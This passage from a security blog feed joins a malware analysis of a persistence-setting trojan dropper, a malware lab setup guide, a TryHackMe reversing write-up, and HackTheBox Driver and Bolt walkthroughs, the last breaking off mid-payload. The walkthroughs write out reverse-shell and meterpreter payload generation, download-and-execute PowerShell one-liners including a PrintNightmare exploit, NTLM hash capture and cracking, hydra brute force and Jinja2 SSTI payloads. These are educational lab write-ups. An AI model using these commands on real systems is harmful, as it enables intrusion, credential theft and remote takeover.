trying to download the IP.php file that it cannot actually reach. I tried to see if I could cURL or wget the file myself but both webservers were down. I killed the process at this point, turned off Wireshark and Procmon capture and now let's save the output from wireshark and procmon.</p> <p><strong>We need to ensure the procmon file is exported with no Sequence ID and Thread ID is included. Also check All Events when saving.</strong> See <a href="https://www.aldeid.com/wiki/ProcDOT#Procmon_export">here</a> for more info. I also saved the wireshark file as a wireshark/tcpdump pcap file instead of pcapng. Use wget on windows and python web server on linux to send the file over.</p> <p>Booting up procdot, load the procmon log file into Procmon and wireshark pcap into Windump.</p> <h2 id="procmon-analysis">Procmon Analysis</h2> <p>The only call made to bejnz.com was a GET /IP.php, which in our case the application always received a dummy PHP. It also tried doing the same from rwkeith.no-ip.org, probably a mirror site. Both URLs were offline so not exactly sure what that endpoint did.</p> <p>The graph is far too long to display here, so I will just use bullet points to describe the general flow</p> <ul> <li>Thread 3340, process "hmm.exe" creates several files such as zCom.resources, tmp8CA2.tmp, dncrnse9.tmp, dncrnse9.0.vb, dncrnse9.cmdline</li> <li>Next it creates a new process, "vbc.exe", PID 4504</li> <li>PID 4504, "vbc.exe"<ul> <li>creates a new process "conhost.exe", which writes and deletes several temp files.</li> <li>It spawns a cvtres.exe which is used to compile resource files into compiled objects. This data is written out to the tmp8CA2.tmp.exe, it also writes a bunch of data to dncmse9.out</li> <li>then deletes its own process and all the temp files created from the initial "hmm.exe"</li> </ul> </li> <li>Back to 3340, "hmm.exe", The process sets some registry keys:<ul> <li>The following are located in HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\<ul> <li>ProxyBypass to 1</li> <li>IntranetName to 1</li> <li>UNCAsIntranet to 1</li> <li>AutoDetect to 0</li> </ul> </li> </ul> </li> <li>PID 2772 "Explorer.EXE" sets a registry key AppID to the full path of "hmm.exe"</li> <li> <p>PID 3624 launches the "tmp8CA2.tmp.exe" executable that was created from "vbc.exe",</p> <ul> <li> <p>it's first action is to delete "hmm.exe" off of my desktop. It then creates System.Web.exe in the same %TEMP% directory and sets an autostart registry key aspnet_state_perf to this executable.</p> </li> <li> <p>More registry keys:</p> <ul> <li>HKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing\tmp8CA2_RASAPI32\<ul> <li>EnableAutoFileTracing to 0</li> <li>EnableFileTracing to 0</li> <li>EnableConsoleTracing to 0</li> <li>FileTracingMask to 4294901760</li> <li>ConsoleTracingMask to 4294901760</li> <li>MaxFileSize to 1048576</li> <li>FileDirectory to %windir%\tracing</li> </ul> </li> <li>It queries the above keys several times</li> </ul> </li> <li>Now we start the network requests.<ul> <li>rwkeithno-ip.org (dead URL)<ul> <li>HTTP request for /IP.php</li> <li>It also sends a bunch of TCP requests to port 127</li> <li>And ICMP packets with <code>abcdefghijklmnopqrstuvwabcdefghi</code> in the data</li> </ul> </li> </ul> </li> </ul> </li> </ul> <h1 id="conclusions_1">Conclusions</h1> <p>With the URLs it tries to access being either dead or useless, this file is <em>mostly</em> harmless, <strong>in its current state</strong>. It appears to be a Trojan / Backdoor Dropper where it unpacks itself to an alternate location, deletes the original file and then sets itself to autorun on startup through the registry. Here's the caveat: If the bejnz or rwkeith servers ever come back up with that requested IP.php it would basically activate and take control of every machine that has been lying dormant with this trojan, as it constantly tries to connect to those servers.</p> <p>We can alsorun the SHA256sum through <a href="https://www.virustotal.com/gui/file/2db4caf14befbe99a9cf51ed7f7c3cade9df666c45579baaffc9e5a53c0b773c/relations">VirusTotal</a> which provides essentially all the same information we just discovered through our own analysis (in reality, this is the first step you should take, but I already knew from the get go that it was malware).</p> <p>Now it's time to reset our windows box back to our last good snapshot and prepare for the next analysis!</p>2022-01-10T18:30:58-05:002022-01-10T18:30:58-05:00Eric Turnertag:blog.ericturner.it,2022-01-10:/2022/01/10/malware-analysis-lab/

<p>I decided to try and get into my own malware analysis, but I needed to create my own lab for safe testing. I wanted to outline how I set mine up.</p> <p>Update 2 Mar 2022: I migrated from VirtualBox to Parallels 16 and I get MUCH better performance, even when …</p>

<p>I decided to try and get into my own malware analysis, but I needed to create my own lab for safe testing. I wanted to outline how I set mine up.</p> <p>Update 2 Mar 2022: I migrated from VirtualBox to Parallels 16 and I get MUCH better performance, even when running both boxes simultaneously. Windows 10 is WAY more fluid and my resource utilization is way down. I am considering upgrading to a new M1 Mac, and Parallels 17 + Windows 11 ARM is the only virtualization software available so this is my test run with Parallels as a hypervisor.</p> <h1 id="quick-overview">Quick Overview</h1> <ul> <li>Main Device: MacBook Pro 2017<ul> <li>Intel i7 2.9 GHz Quad-Core Processor</li> <li>16GB 2133 MHz LPDDR3 RAM</li> <li>Radeon Pro 560 4 GB Graphics</li> <li>500 GB internal SSD, 1TB external Samsung SSD (<a href="https://www.samsung.com/us/computing/memory-storage/portable-solid-state-drives/portable-ssd-t7-usb-3-2-1tb--gray--mu-pc1t0t-am/">MU-PC1T0T</a>)</li> </ul> </li> <li>Parallels Virtual Machines<ul> <li>Linux Box running <a href="https://docs.remnux.org/">REMnux v7</a> (Ubuntu v20.04.3 LTS)<ul> <li>4096 MB RAM</li> <li>128 MB VRAM</li> <li>50GB VDisk on the external SSD</li> <li>2 Network Adapters<ul> <li>One adapter configured with static IP of <code>10.10.2.2</code> (private network. no internet)</li> <li>One adapter using Shared Network (DHCP) for internet access</li> </ul> </li> </ul> </li> <li>Windows Box running un-activated Windows 10 Pro<ul> <li>4096 MB RAM</li> <li>128 MB VRAM</li> <li>50GB VDisk on the external SSD</li> <li>1 Network Adapter<ul> <li>Configured with static IP of <code>10.10.2.3</code>, default gateway and DNS set to go back to REMnux box of <code>10.10.2.2</code></li> </ul> </li> </ul> </li> </ul> </li> </ul> <h1 id="setup">Setup</h1> <h2 id="vm-setup-phase-1">VM Setup - Phase 1</h2> <ol> <li>Create a new virtualbox VM. Download the .ova file from REMnux <a href="https://docs.remnux.org/install-distro/get-virtual-appliance">here</a> and install.</li> <li>Run <code>remnux upgrade</code> and waited a while to ensure it was all up-to-date. I also ran <code>sudo apt-get update &amp;&amp; sudo apt-get upgrade</code> just to be sure.</li> <li>Shut down the VM and make a snapshot of latest patches</li> <li>Create a second virtualbox VM for windows. I downloaded a fresh .iso from Microsoft <a href="https://www.microsoft.com/en-us/software-download/windows10ISO">here</a> and went through the setup. I provided it a key for Windows 10 Pro I found even though I had no actual intentions of activating.</li> <li>Download and install flare-vm tools from <a href="https://github.com/mandiant/flare-vm">here</a>. Wait for it to install then shutdown and save a snapshot</li> </ol> <h2 id="network-setup">Network Setup</h2> <p>Now it's time for the network setup to get these two boxes communicating with each other.</p> <p>In VirtualBox, add a new network adapter to both machines like so:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/01/adapter.webp"/></p> <p>New Adapter</p> <p>Make sure the name matches.</p> <h3 id="remnux-network-setup">REMnux Network Setup</h3> <p>REMnux uses <code>netplan</code> for configuration. After adding the new adapter in the previous step, boot the VM back up and run <code>ifconfig</code>. There will be two <code>enp0s#</code> adapters, one of which will have an IP and the second doesn't have anything. For me, they were <code>enp0s3</code> and <code>enp0s8</code>.</p> <p>Run <code>ls /etc/netplan</code> to see the name of the configuration file that is being used. Mine was <code>01-netcfg.yaml</code> so I can edit it with <code>sudo nano /etc/netplan/01-netcfg.yaml</code>. I created the <code>enp0s8</code> adapter and saved it:</p> <div class="highlight"><pre><span></span><code><span class="c1"># This file describes the network interfaces available on your system</span> <span class="c1"># For more information, see netplan(5).</span> <span class="nt">network</span><span class="p">:</span> <span class="w"> </span><span class="nt">version</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">2</span> <span class="w"> </span><span class="nt">renderer</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">networkd</span> <span class="w"> </span><span class="nt">ethernets</span><span class="p">:</span> <span class="w"> </span><span class="nt">enp0s3</span><span class="p">:</span> <span class="w"> </span><span class="nt">dhcp4</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">yes</span> <span class="w"> </span><span class="nt">enp0s8</span><span class="p">:</span> <span class="w"> </span><span class="nt">addresses</span><span class="p">:</span> <span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">10.10.2.2/24</span> </code></pre></div> <p>Apply the changes with <code>sudo netplan apply</code> and now if you run <code>ifconfig</code> you will see the static IP for the new <code>enp0s8</code> adapter:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/01/adapters.webp"/></p> <p>Our two adapters</p> <h3 id="windows-network-setup">Windows Network Setup</h3> <p>Navigate to the Network Connections in Control Panel. Right click the Network Adapter, Click Properties. In the new window, find Internet Protocol Version 4 and click it, then click Properties.</p> <p>The IP address can be anything, I chose <code>10.10.2.3</code> with a subnet mask of <code>255.255.255.0</code> ensure the first 3 octets match the octet range used for the linux box. Now the Default Gateway and Preferred DNS server need to point back to the same IP used for the linux box.</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/01/image-12.webp"/></p> <p>Completed Network Settings</p> <h1 id="remnux-lab-preparation_2">REMnux Lab Preparation</h1> <p>Shutdown both boxes and create a snapshot. This will be where to return after doing any malware infections or if something goes awry. Returning to this point ensures we have upgraded boxes with the network setup properly.</p> <p>To actually start properly capturing the data from the windows box into REMnux, we open two terminals and run a command in each. Be sure to replace the network adapter and IP with whatever you used for this linux box.</p> <div class="highlight"><pre><span></span><code>$<span class="w"> </span>accept-all-ips<span class="w"> </span>start<span class="w"> </span>enp0s8 <span class="c1"># After that command runs, next run the following (using the IP you set the box to)</span> $<span class="w"> </span>sudo<span class="w"> </span>inetsim<span class="w"> </span>--bind-address<span class="w"> </span><span class="m">10</span>.10.2.2 </code></pre></div> <p>In a second terminal run:</p> <div class="highlight"><pre><span></span><code>$<span class="w"> </span>sudo<span class="w"> </span>fakedns<span class="w"> </span>-I<span class="w"> </span><span class="m">10</span>.10.2.2 </code></pre></div> <p>Now we will have all network traffic that comes through our box captured. The <code>fakedns</code> will respond to every DNS call with its own IP. The <code>inetsim</code> will return an HTML page whenever the website is then requested.</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/01/services.webp"/></p> <p>Our running services, note all of the DNS hits in the terminal on the right being redirected to ourselves</p> <p>Open Wireshark on the REMnux box and choose the same <code>enp0s8</code> adapter, here we can monitor all the queries being made from our windows box! Test it by trying to open anything on the Windows box:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/01/done.webp"/></p> <p>Success!</p> <p>This query should make a hit on the DNS terminal and in Wireshark. Now we are ready for any malware to come through and try to make network requests</p> <h1 id="windows-preparation">Windows Preparation</h1> <p>On our windows box, we can start up procmon right before we execute the malware to keep track of what processes are changing in the background. Once we let it run for several minutes, Save the file as .csv and send to procDot to help clean it up and generate a process graph!</p> <p>procDot also needs windump.exe, which can be installed from <a href="https://www.winpcap.org/windump/">here</a>, and dot.exe can be found in <code>C:\Program Files\GraphViz\bin\dot.exe</code>.</p> <h1 id="ready">Ready</h1> <p>Now we have snapshots, network communication and tracking and process tracking. We are ready to roll!</p> <h1 id="references">References:</h1> <ul> <li>Building a Custom Lab: <a href="https://www.sentinelone.com/labs/building-a-custom-malware-analysis-lab-enviro">https://www.sentinelone.com/labs/building-a-custom-malware-analysis-lab-environment/</a></li> <li>Configuring Network on Ubuntu: <a href="https://serverspace.io/support/help/configuring-the-network-interface-in-ubuntu-18-04/">https://serverspace.io/support/help/configuring-the-network-interface-in-ubuntu-18-04/</a></li> </ul>2022-01-07T14:20:35-05:002022-01-07T14:20:35-05:00Eric Turnertag:blog.ericturner.it,2022-01-07:/2022/01/07/tryhackme-basic-malware-re/

<p>Link: <a href="https://tryhackme.com/room/basicmalwarere">https://tryhackme.com/room/basicmalwarere</a></p> <p>This is another one of the free rooms in the <a href="https://tryhackme.com/module/malware-analysis">Malware Analysis Module</a> of TryHackMe.</p> <p>This is a challenge room, where we are given files and just need to try a flag, instead of a more guided learning room.</p> <h1 id="challenge-1">Challenge 1</h1> <p>Running <code>strings</code> on …</p>

<p>Link: <a href="https://tryhackme.com/room/basicmalwarere">https://tryhackme.com/room/basicmalwarere</a></p> <p>This is another one of the free rooms in the <a href="https://tryhackme.com/module/malware-analysis">Malware Analysis Module</a> of TryHackMe.</p> <p>This is a challenge room, where we are given files and just need to try a flag, instead of a more guided learning room.</p> <h1 id="challenge-1">Challenge 1</h1> <p>Running <code>strings</code> on this executable is no good, it returns over 1600 random flags. But popping this file into IDA immediately shows us the correct one:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/01/image-9.webp"/></p> <h1 id="challenge-2">Challenge 2</h1> <p>I threw this file back into IDA and it is very similar where it prints each character of the flag in order:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/01/image-10.webp"/></p> <h1 id="challenge-3">Challenge 3</h1> <p>This one is a bit trickier, running <code>strings</code> or putting it through IDA shows no references to <code>flag{</code>. I tried searching the strings and found nothing. Stumped, I switched from IDA to Ghidra to see if it helped. Doing so immediately helped reveal the flag by hovering over the final parameter of LoadStringA in the entry function.</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2022/01/image-11.webp"/></p>2021-10-04T15:31:18-04:002021-10-04T15:31:18-04:00Eric Turnertag:blog.ericturner.it,2021-10-04:/2021/10/04/hack-the-box-driver/

<p>Link: <a href="https://app.hackthebox.eu/machines/Driver">https://app.hackthebox.eu/machines/Driver</a></p> <h1 id="enumeration">Enumeration</h1> <h2 id="tcp-port-scan">TCP Port Scan</h2> <p><img alt="" src="https://blog.ericturner.it/uploads/2021/10/image.webp"/></p> <p>nmap top 1000 ports with version detection</p> <p>Our port scan reveals a possible windows 7-10 machine with a web server up.</p> <p>I used metasploits' <code>auxiliary/scanner/smb/smb_version</code> to find the SMB and Windows version and it returned SMB …</p>

<p>Link: <a href="https://app.hackthebox.eu/machines/Driver">https://app.hackthebox.eu/machines/Driver</a></p> <h1 id="enumeration">Enumeration</h1> <h2 id="tcp-port-scan">TCP Port Scan</h2> <p><img alt="" src="https://blog.ericturner.it/uploads/2021/10/image.webp"/></p> <p>nmap top 1000 ports with version detection</p> <p>Our port scan reveals a possible windows 7-10 machine with a web server up.</p> <p>I used metasploits' <code>auxiliary/scanner/smb/smb_version</code> to find the SMB and Windows version and it returned SMB 3.1.1, Windows 10 Enterprise build 10240.</p> <h2 id="web-server">Web Server</h2> <p>Attempting to navigate to the web server pops up an authentication prompt "MFP Firmware Update Center. Please enter password for admin".</p> <p>Fortunately for us, <code>admin</code>:<code>admin</code> worked as the credentials. The only important page here is the Firmware Updates tab. It allows us to select a printer model and upload firmware. I inspected the headers of the page and we see the server is Microsoft-IIS/10.0 and an X-Powered-By PHP/7.3.25 header. My next guess is we need to supply either a windows binary or PHP shell script to the upload form and see what it does. We'd also need to know where the file uploads to. A gobuster scan only reveals a /images directory without directory indexing so we cannot see inside of it.</p> <p>I attempted to load a revshell.php file to the firmware upload and then went to see if we could access it under /images/revshell.php but no dice.</p> <p>I used <code>msfvenom</code> to generate a reverse shell payload for windows using the following command:</p> <div class="highlight"><pre><span></span><code>$<span class="w"> </span>msfvenom<span class="w"> </span>-p<span class="w"> </span>windows/x64/shell_reverse_tcp<span class="w"> </span><span class="nv">LHOST</span><span class="o">=</span><span class="m">10</span>.10.14.58<span class="w"> </span><span class="nv">LPORT</span><span class="o">=</span><span class="m">4444</span><span class="w"> </span>-f<span class="w"> </span>exe<span class="w"> </span>&gt;<span class="w"> </span>shell.exe<span class="w"> </span> </code></pre></div> <p>I tried the .exe for each of the 4 printer models and waited a few minutes but nothing happened and I never received a callback.</p> <p>My next thought is to intercept the request with BurpSuite and change the printer name to some sort of command instead of relying on the file upload.</p> <p>I was a bit stumped here so I ran a full port scan over ports 1-65535 and discovered a new port, 5985 which is WinRM.</p> <p>Also if we look on the firmware upload page it says the form will "upload the respective firmware update to our file share. I found this <a href="https://1337red.wordpress.com/using-a-scf-file-to-gather-hashes/">article on using an SCF file to intercept NTLM hashes</a>. After following the article and uploading the .scf file, we get 7 hits for user DRIVER\tony and an NTLMv2 Hash.</p> <p>I copied the first hash and echoed it to a file. Next using hashcat:</p> <div class="highlight"><pre><span></span><code>$<span class="w"> </span>hashcat<span class="w"> </span>-m<span class="w"> </span><span class="m">5600</span><span class="w"> </span>-a<span class="w"> </span><span class="m">0</span><span class="w"> </span>ntlm<span class="w"> </span>/usr/share/wordlists/rockyou.txt<span class="w"> </span> </code></pre></div> <p>Nets us a password of <code>tony:liltony</code></p> <h2 id="winrm">WinRM</h2> <p>Since I discovered port 5985, WinRM, on the second nmap scan, we can use <code>evil-winrm</code> to try and gain access.</p> <div class="highlight"><pre><span></span><code>$<span class="w"> </span>evil-winrm<span class="w"> </span>-i<span class="w"> </span><span class="m">10</span>.129.214.79<span class="w"> </span>-u<span class="w"> </span>tony<span class="w"> </span>-p<span class="w"> </span>liltony </code></pre></div> <p>This command connects us as tony and gives us a PS command line, we can find the user.txt on tony's desktop.</p> <h1 id="priv-esc_1">Priv Esc</h1> <p>I downloaded WinPEAS from <a href="https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS/winPEASexe">here</a> onto my machine, then then ran the following:</p> <div class="highlight"><pre><span></span><code><span class="p">&gt;</span> <span class="nb">Invoke-WebRequest</span> <span class="n">-Uri</span> <span class="n">http</span><span class="p">://</span><span class="n">10</span><span class="p">.</span><span class="n">10</span><span class="p">.</span><span class="n">x</span><span class="p">.</span><span class="n">x</span><span class="p">:</span><span class="n">8000</span><span class="p">/</span><span class="n">winPEASany</span><span class="p">.</span><span class="n">exe</span> <span class="n">-OutFile</span> <span class="n">winPEASany</span><span class="p">.</span><span class="n">exe</span> <span class="p">&gt;</span> <span class="p">./</span><span class="n">winPEASany</span><span class="p">.</span><span class="n">exe</span> </code></pre></div> <p>One interesting thing the script found was a scheduled bat file as admin:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2021/10/image-1.webp"/></p> <p>automated job</p> <p>The actual contents of these scripts are here:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2021/10/image-2.webp"/></p> <p>script source code</p> <p>It appears it references the firmware folder again, that must be where the uploader would drop files. It seems that it checks all open shell windows and if the location url of the shell equals C:\firmwares then it quits the shell.</p> <p>I looked more into print driver CVE since it seems what this box is all about and found one by the name of PrintNightmare, found <a href="https://github.com/calebstewart/CVE-2021-1675">here</a>.</p> <p>I downloaded the CVE code to my machine then threw up the Python web server again. In WinRM, I ran the following:</p> <div class="highlight"><pre><span></span><code><span class="p">&gt;</span> <span class="n">IEX</span><span class="p">(</span><span class="nb">New-Object</span> <span class="n">Net</span><span class="p">.</span><span class="n">Webclient</span><span class="p">).</span><span class="n">downloadstring</span><span class="p">(</span><span class="s1">'http://10.10.x.x:8000/CVE-2021-1675.ps1'</span><span class="p">)</span> <span class="p">&gt;</span> <span class="nb">Invoke-Nightmare</span> <span class="n">-NewUser</span> <span class="s2">"SuperAdmin"</span> <span class="n">-NewPassword</span> <span class="s2">"SuperAdmin"</span> <span class="p">[+]</span> <span class="n">created</span> <span class="n">payload</span> <span class="n">at</span> <span class="n">C</span><span class="p">:\</span><span class="n">Users</span><span class="p">\</span><span class="n">tony</span><span class="p">\</span><span class="n">AppData</span><span class="p">\</span><span class="n">Local</span><span class="p">\</span><span class="n">Temp</span><span class="p">\</span><span class="n">nightmare</span><span class="p">.</span><span class="n">dll</span> <span class="p">[+]</span> <span class="n">using</span> <span class="n">pDriverPath</span> <span class="p">=</span> <span class="s2">"C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_f66d9eed7e835e97\Amd64\mxdwdrv.dll"</span> <span class="p">[+]</span> <span class="n">added</span> <span class="n">user</span> <span class="n">SuperAdmin</span> <span class="n">as</span> <span class="n">local</span> <span class="n">administrator</span> <span class="p">[+]</span> <span class="n">deleting</span> <span class="n">payload</span> <span class="n">from</span> <span class="n">C</span><span class="p">:\</span><span class="n">Users</span><span class="p">\</span><span class="n">tony</span><span class="p">\</span><span class="n">AppData</span><span class="p">\</span><span class="n">Local</span><span class="p">\</span><span class="n">Temp</span><span class="p">\</span><span class="n">nightmare</span><span class="p">.</span><span class="n">dll</span> </code></pre></div> <p>Now we can kill WinRM and login with our new credentials.</p> <div class="highlight"><pre><span></span><code>$<span class="w"> </span>evil-winrm<span class="w"> </span>-i<span class="w"> </span><span class="m">10</span>.129.214.79<span class="w"> </span>-u<span class="w"> </span>SuperAdmin<span class="w"> </span>-p<span class="w"> </span>SuperAdmin </code></pre></div> <p>Now we have local admin rights, we can <code>cd</code> to C:\Users\Administrator\Desktop for the admin flag!</p> <h1 id="get-admin-hash">Get Admin Hash</h1> <p>Finally, I did a few extra steps to get the admin hash to lock this blog post.</p> <div class="highlight"><pre><span></span><code><span class="c1"># my machine</span> $<span class="w"> </span>msfvenom<span class="w"> </span>-p<span class="w"> </span>windows/x64/meterpreter/reverse_tcp<span class="w"> </span><span class="nv">LPORT</span><span class="o">=</span><span class="m">4444</span><span class="w"> </span><span class="nv">LHOST</span><span class="o">=</span><span class="m">10</span>.10.x.x<span class="w"> </span>-f<span class="w"> </span>exe<span class="w"> </span>&gt;<span class="w"> </span>m.exe $<span class="w"> </span>python3<span class="w"> </span>-m<span class="w"> </span><span class="s2">"http.server"</span> $<span class="w"> </span>msfconsole <span class="o">(</span>msf6<span class="o">)</span><span class="w"> </span>&gt;<span class="w"> </span>use<span class="w"> </span>exploit/multi/handler <span class="o">(</span>msf6<span class="o">)</span><span class="w"> </span>&gt;<span class="w"> </span><span class="nb">set</span><span class="w"> </span>PAYLOAD<span class="w"> </span>payload/windows/x64/meterpreter/reverse_tcp <span class="o">(</span>msf6<span class="o">)</span><span class="w"> </span>&gt;<span class="w"> </span><span class="nb">set</span><span class="w"> </span>LHOST<span class="w"> </span><span class="m">10</span>.10.x.x <span class="o">(</span>msf6<span class="o">)</span><span class="w"> </span>&gt;<span class="w"> </span>run </code></pre></div> <div class="highlight"><pre><span></span><code><span class="c"># victim machine through WinRM, as SuperAdmin</span> <span class="p">&gt;</span> <span class="nb">Invoke-WebRequest</span> <span class="n">-Uri</span> <span class="n">http</span><span class="p">://</span><span class="n">10</span><span class="p">.</span><span class="n">10</span><span class="p">.</span><span class="n">x</span><span class="p">.</span><span class="n">x</span><span class="p">:</span><span class="n">8000</span><span class="p">/</span><span class="n">m</span><span class="p">.</span><span class="n">exe</span> <span class="n">-OutFile</span> <span class="n">m</span><span class="p">.</span><span class="n">exe</span> <span class="p">&gt;</span> <span class="p">./</span><span class="n">m</span><span class="p">.</span><span class="n">exe</span> </code></pre></div> <p>Our listener through metasploit makes a connection and we can run <code>hashdump</code> to get the hash for the admin account.</p>2021-10-01T11:31:20-04:002021-10-01T11:31:20-04:00Eric Turnertag:blog.ericturner.it,2021-10-01:/2021/10/01/hackthebox-bolt/

<p>Link: <a href="https://app.hackthebox.eu/machines/Bolt">https://app.hackthebox.eu/machines/Bolt</a></p> <h1 id="enumeration">Enumeration</h1> <h2 id="tcp-port-scan">TCP Port Scan</h2> <p><img alt="" src="https://blog.ericturner.it/uploads/2021/09/image-94.webp"/></p> <p>nmap top 1000 ports tcp port scan with version detection</p> <p>Preliminary port scan reveals SSH on port 22 and two web servers on ports 80 and 443.</p> <h2 id="ssl-web-server">SSL Web Server</h2> <p>Attempting to access the https version of the website …</p>

<p>Link: <a href="https://app.hackthebox.eu/machines/Bolt">https://app.hackthebox.eu/machines/Bolt</a></p> <h1 id="enumeration">Enumeration</h1> <h2 id="tcp-port-scan">TCP Port Scan</h2> <p><img alt="" src="https://blog.ericturner.it/uploads/2021/09/image-94.webp"/></p> <p>nmap top 1000 ports tcp port scan with version detection</p> <p>Preliminary port scan reveals SSH on port 22 and two web servers on ports 80 and 443.</p> <h2 id="ssl-web-server">SSL Web Server</h2> <p>Attempting to access the https version of the website prompts a security warning. We can further investigate this certificate and get the common name of the website:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2021/09/image-95.webp"/></p> <p>certificate</p> <p>I added <code>passbolt.bolt.htb</code> and <code>bolt.htb</code> to my <code>/etc/hosts</code> file for convenience. Now accessing the URL gives a login page:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2021/09/image-96.webp"/></p> <p>login</p> <p>I attempted to enter <code>admin@bolt.htb</code> and get the following error:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2021/09/image-97.webp"/></p> <p>invitation error</p> <p>We could probably use this error to help us identify valid email addresses but for now I'm going to check out the regular website on port 80 and see what we can determine from there.</p> <h2 id="web-server-port-80">Web Server (Port 80)</h2> <p>We get a pretty standard boilerplate template for the main website but there is a login page. The title of this page is <code>Boilerplate Code Jinja - Sign IN | AppSeed</code>. Jinja tells us we have a templating engine in Python, so we could have a SSTI vulnerability with this login and registration form.</p> <p>I attempted to register with:</p> <div class="highlight"><pre><span></span><code><span class="x">Username: </span><span class="cp">{{</span><span class="m">3</span><span class="o">*</span><span class="m">3</span><span class="cp">}}</span> <span class="x">Email: </span><span class="cp">{{</span><span class="m">3</span><span class="o">*</span><span class="m">3</span><span class="cp">}}</span><span class="x">@gmail.com</span> <span class="x">Pass: test</span> </code></pre></div> <p>But it throws an internal service error. It appears no matter what gets tried it will consistently return a 500 error when trying to register.</p> <p>Back on the <code>/login</code> endpoint, I attempted credentials <code>test:test</code> and got an <code>Invalid login. Forbidden.</code> Most notably, however, <code>admin:admin</code> returns <code>Invalid password. Please try again.</code> We could definitely brute force this since we know <code>admin</code> is a valid username.</p> <div class="highlight"><pre><span></span><code>$<span class="w"> </span>hydra<span class="w"> </span>-l<span class="w"> </span>admin<span class="w"> </span>-P<span class="w"> </span>/usr/share/wordlists/rockyou.txt<span class="w"> </span>bolt.htb<span class="w"> </span>http-post-form<span class="w"> </span><span class="s2">"/login:username=^USER^&amp;password=^PASS^:Invalid password"</span><span class="w"> </span>-V </code></pre></div> <p>While this is running, we can perform a gobuster directory scan:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2021/09/image-98.webp"/></p> <p>gobuster directory</p> <p>I also performed a GoBuster vhost scan and discovered mail.bolt.htb and demo.bolt.htb that I added to /etc/hosts.</p> <h2 id="docker-image">Docker Image</h2> <p>We have several endpoints revealed. /download gives us a docker tar image, we can load it with:</p> <div class="highlight"><pre><span></span><code>$<span class="w"> </span>sudo<span class="w"> </span>docker<span class="w"> </span>load<span class="w"> </span>-i<span class="w"> </span>image.tar $<span class="w"> </span>sudo<span class="w"> </span>docker<span class="w"> </span>run<span class="w"> </span>flask-dashboard-adminlte_appseed-app:latest </code></pre></div> <p>Next I navigated to our docker container's IP and saw this:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2021/09/image-99.webp"/></p> <p>However browsing around shows this is just another pre-built template with nothing of interest. Looking in the various layer.tar files in the image, I found an .env file with the following:</p> <div class="highlight"><pre><span></span><code>DEBUG=True SECRET_KEY=S3cr3t_K#Key DB_ENGINE=postgresql DB_NAME=appseed-flask DB_HOST=localhost DB_PORT=5432 DB_USERNAME=appseed DB_PASS=pass </code></pre></div> <p>Inside of the layer starting with /a4ea7da..., there is a db.sqlite3 file. Opening this shows a username and password hash for admin@bolt.htb:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2021/09/image-100.webp"/></p> <p>admin hash</p> <p>I saved this to a file and used hashcat to crack the password</p> <div class="highlight"><pre><span></span><code>$<span class="w"> </span>hashcat<span class="w"> </span>-a<span class="w"> </span><span class="m">0</span><span class="w"> </span>-m<span class="w"> </span><span class="m">500</span><span class="w"> </span><span class="nb">hash</span><span class="w"> </span>/usr/share/wordlists/rockyou.txt<span class="w"> </span> </code></pre></div> <p>And in less than 30 seconds we get a match:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2021/09/image-101.webp"/></p> <p>password cracked</p> <p>If we use these credentials on the http://bolt.htb/login, it grants us access.</p> <h2 id="web-server-port-80-authenticated">Web Server (Port 80) Authenticated</h2> <p>We see a similar Admin dashboard to the docker container. I searched around and we can do XSS on the calendar page for JS. Refreshing the page purges the calendar back to original. It seems like this dashboard is a dead end. I found two additional domains from the gobuster vhost scan from before, let's check those out</p> <h2 id="demobolthtb">demo.bolt.htb</h2> <p>It looks very similar to the original, however when attempting to register it requires an invite code. The admin:deadbolt credentials do not work on here.</p> <p>If we dive back into the image.tar from earlier, inside of the layer starting with /41093412e0..., and inside /layer.tar/app/base/routes.py is code to check for the invitation code:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2021/09/image-102.webp"/></p> <p>invitation code</p> <p>Using this code with test:test and email of test@bolt.htb, we can log in to demo.bolt.htb. Although, it looks very similar to the other dashboard just with more templates on the sidebar and I cannot really find anything interesting.</p> <h2 id="mailbolthtb">mail.bolt.htb</h2> <p>The admin:deadbolt credentials still do not work here, however the test:test we created on demo.bolt.htb do work here. I attempted to send an email but it fails.</p> <p>After much testing, if you edit your profile on demo.bolt.htb:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2021/09/image-103.webp"/></p> <p>edit profile</p> <p>It will send an email for confirmation via mail.bolt.htb:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2021/09/image-104.webp"/></p> <p>confirm changes</p> <p>If we do SSTI such as {{3*3}}, it is reflected in the email:</p> <p><img alt="" src="https://blog.ericturner.it/uploads/2021/09/image-105.webp"/></p> <p>SSTI Python</p> <p>From this page, the last payload for Jinja2 filter bypass works. I replaced the <code>id</code> command with a reverse shell like so:</p> <div class="highlight"><pre><span></span><code><span class="cp">{{</span><span class="nv">request</span><span class="o">|</span><span class="nf">attr</span><span class="o">(</span><span class="s1">'application'</span><span class="o">)|</span><span class="nf">attr</span><span class="o">(</span><span class="s1">'\x5f\x5fglobals\x5f\x5f'</span><span class="o">)|</span><span class="nf">attr</span><span class="o">(</span><span 